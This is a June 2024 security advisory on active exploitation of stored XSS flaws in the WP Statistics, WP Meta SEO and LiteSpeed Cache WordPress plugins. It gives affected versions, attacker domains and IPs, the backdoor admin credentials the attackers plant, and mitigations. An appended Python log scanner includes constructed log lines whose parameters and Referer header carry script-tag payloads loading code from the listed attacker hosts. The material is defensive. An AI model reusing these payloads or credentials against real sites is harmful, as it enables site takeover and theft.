Active Exploitation of Stored XSS Vulnerabilities in WordPress Plugins (CVE-2024-2194, CVE-2023-6961, CVE-2023-40000)

Bar Refael

June 3, 2024

Recent attacks have actively exploited unauthenticated stored cross-site scripting (XSS) vulnerabilities in three popular WordPress plugins: WP Statistics (CVE-2024-2194), WP Meta SEO (CVE-2023-6961) and LiteSpeed Cache (CVE-2023-40000). All three stem from inadequate input sanitization and output escaping: attacker-controlled request data (a query parameter or an HTTP header) is stored by the plugin and later rendered without escaping in pages that an administrator views, so the injected script runs in that administrator's browser with that administrator's privileges.

Vulnerability Overview

CVE-2024-2194:

  • Affected Plugin: WP Statistics (versions 14.5 and earlier)
  • Vulnerability: Stored XSS via the URL search parameter
  • Active Installations: Over 600,000
  • Disclosure Date: March 11, 2024

CVE-2023-6961:

  • Affected Plugin: WP Meta SEO (versions 4.5.12 and earlier)
  • Vulnerability: Stored XSS via the Referer HTTP header
  • Active Installations: Over 20,000
  • Disclosure Date: April 16, 2024

CVE-2023-40000:

  • Affected Plugin: LiteSpeed Cache (versions before 5.7.0.1)
  • Vulnerability: Stored XSS through ‘nameservers’ and ‘_msg’ parameters
  • Active Installations: Over 5 million
  • Disclosure Date: February 2024

Technical Details

The injected script tag loads a second stage from attacker-controlled domains (listed under Threat Actor Activity below). Once that script executes in a logged-in administrator's browser it can:

  1. Inject Malicious PHP Backdoors:
    • Into plugin and theme files.
  2. Create a New Administrator Account:
    • Username: admin
    • Password: 7F9SzCnS6g3AFLAO39Ro
  3. Initiate Tracking:
    • Implement tracking via JavaScript or a tracking pixel.

Threat Actor Activity

  • CVE-2024-2194:
    • Domain: media.cdnstaticjs[.]com
    • Geographic Concentration: Primarily from the Netherlands
  • CVE-2023-6961:
    • Domain: idc.cloudiync[.]com
    • Exploitation Attempts: Over 5 billion requests
  • CVE-2023-40000:
    • Domains: cloud.cdndynamic[.]com, go.kcloudinc[.]com, cdn.mediajsdelivery[.]com
    • IP Addresses: Distributed across 1664 distinct IP addresses

Indicators of Compromise (IoCs)

Domains:

  • media.cdnstaticjs[.]com
  • cloud.cdndynamic[.]com
  • idc.cloudiync[.]com
  • cdn.mediajsdelivery[.]com
  • go.kcloudinc[.]com
  • assets.scontentflow[.]com
  • cache.cloudswiftcdn[.]com

IP Addresses:

  • 80.82.76[.]214
  • 31.43.191[.]220
  • 94.102.51[.]144
  • 94.102.51[.]95
  • 91.223.82[.]150
  • 185.7.33[.]129
  • 101.99.75[.]178
  • 94.242.61[.]217
  • 80.82.78[.]133
  • 111.90.150[.]154
  • 103.155.93[.]120
  • 185.100.87[.]144
  • 185.162.130[.]23
  • 101.99.75[.]215
  • 111.90.150[.]123
  • 103.155.93[.]244
  • 185.209.162[.]247
  • 179.43.172[.]148
  • 185.159.82[.]103
  • 185.247.226[.]37
  • 185.165.169[.]62

Mitigation and Recommendations

  1. Update Affected Plugins: Upgrade WP Statistics to a release newer than 14.5 (14.5 itself is listed as vulnerable above), WP Meta SEO to 4.5.13 or later, and LiteSpeed Cache to 5.7.0.1 or later.
  2. Monitor for IoCs: Search web-server access logs, outbound DNS and proxy logs, and rendered page source for the domains and IP addresses listed above. Because the payload leaves a PHP backdoor and an administrator account behind, also review wp_users for unexpected administrators and compare plugin and theme files against clean copies of the same versions.
  3. Strengthen Security Posture: Sanitize on input (for example with sanitize_text_field()) and escape on output with the WordPress function matching the output context (esc_html(), esc_attr(), esc_url()), and treat request headers such as Referer as untrusted input like any query parameter.
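A concrete form of the log monitoring above, as an added example that is not part of the original advisory: it parses Apache/Nginx combined-format access-log lines and flags a request when a query parameter or the Referer header carries a script payload (how the three stored-XSS bugs are reached), when the request or Referer names one of the listed domains, or when the client IP is one of the listed addresses. The IoC lists are copied from the advisory in defanged form and re-fanged in code; the log lines at the bottom are constructed for the example and are not real traffic.

```python
"""Scan web-server access logs for exploitation attempts and the listed IoCs.

Added example, not code from the advisory. Assumes combined log format
(ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent").
"""
import re
from urllib.parse import parse_qs, unquote_plus

IOC_DOMAINS = [
    "media.cdnstaticjs[.]com", "cloud.cdndynamic[.]com", "idc.cloudiync[.]com",
    "cdn.mediajsdelivery[.]com", "go.kcloudinc[.]com", "assets.scontentflow[.]com",
    "cache.cloudswiftcdn[.]com",
]
IOC_IPS = [
    "80.82.76[.]214", "31.43.191[.]220", "94.102.51[.]144", "94.102.51[.]95",
    "91.223.82[.]150", "185.7.33[.]129", "101.99.75[.]178", "94.242.61[.]217",
    "80.82.78[.]133", "111.90.150[.]154", "103.155.93[.]120", "185.100.87[.]144",
    "185.162.130[.]23", "101.99.75[.]215", "111.90.150[.]123", "103.155.93[.]244",
    "185.209.162[.]247", "179.43.172[.]148", "185.159.82[.]103", "185.247.226[.]37",
    "185.165.169[.]62",
]


def refang(ioc: str) -> str:
    """Turn the advisory's defanged form (example[.]com) back into a matchable string."""
    return ioc.replace("[.]", ".")


DOMAINS = sorted(refang(d) for d in IOC_DOMAINS)
IPS = {refang(ip) for ip in IOC_IPS}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Markers of an HTML/JS payload after URL-decoding: script tags, javascript: URLs
# and the most common inline event handlers used when <script> is filtered.
SCRIPT_RE = re.compile(
    r"<\s*/?\s*script\b|javascript\s*:|\bon(?:error|load|click|mouseover|focus)\s*=", re.I
)


def scan_line(lineno: int, line: str):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparsable line; a real deployment should count these separately
    ip = m["ip"]
    raw_path, _, raw_query = m["path"].partition("?")
    referer = unquote_plus(m["ref"])
    reasons = []

    # (1) payload in any query parameter: WP Statistics (search parameter) and
    # LiteSpeed Cache ('nameservers', '_msg') are reached this way.
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        if any(SCRIPT_RE.search(v) for v in values):
            reasons.append(f"script-in-param:{name}")
    # (1b) payload in the Referer header: the WP Meta SEO vector.
    if SCRIPT_RE.search(referer):
        reasons.append("script-in-referer")
    # (2) second-stage loader domains from the advisory, in request or Referer.
    decoded_request = unquote_plus(m["path"])
    for d in DOMAINS:
        if d in decoded_request or d in referer:
            reasons.append(f"ioc-domain:{d}")
    # (3) known attacking source address.
    if ip in IPS:
        reasons.append("ioc-ip")

    if not reasons:
        return None
    return {"line": lineno, "ip": ip, "time": m["ts"], "path": raw_path, "reasons": reasons}


def scan_log(lines):
    """Scan an iterable of log lines; returns findings in file order."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        hit = scan_line(lineno, line.rstrip("\n"))
        if hit:
            findings.append(hit)
    return findings


# Constructed sample log (not real traffic). Lines 2-4 mimic the three vectors.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jun/2024:10:00:01 +0000] "GET /?s=caching HTTP/1.1" 200 5123 "https://example.org/" "Mozilla/5.0"',
    '80.82.76.214 - - [01/Jun/2024:10:00:07 +0000] "GET /?nameservers=%3Cscript%20src%3D%22https%3A%2F%2Fcloud.cdndynamic.com%2Fx.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Jun/2024:10:00:09 +0000] "GET /about/ HTTP/1.1" 200 4410 "<script src=https://idc.cloudiync.com/1.js></script>" "Mozilla/5.0"',
    '185.7.33.129 - - [01/Jun/2024:10:00:12 +0000] "GET /wp-login.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '203.0.113.44 - - [01/Jun/2024:10:00:15 +0000] "GET /?utm_id=spring-sale HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["ip"], hit["path"], ", ".join(hit["reasons"]))
```

Decoding before matching matters: the LiteSpeed-style request arrives percent-encoded, so a plain substring search for `<script` or for the domain on the raw line would miss it. A hit on the source-IP list alone (line 4) is weaker evidence than a payload in a parameter or Referer, so keep the reasons separate when triaging.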

Stay Secure. Stay Informed.

OP Innovate Research Team.
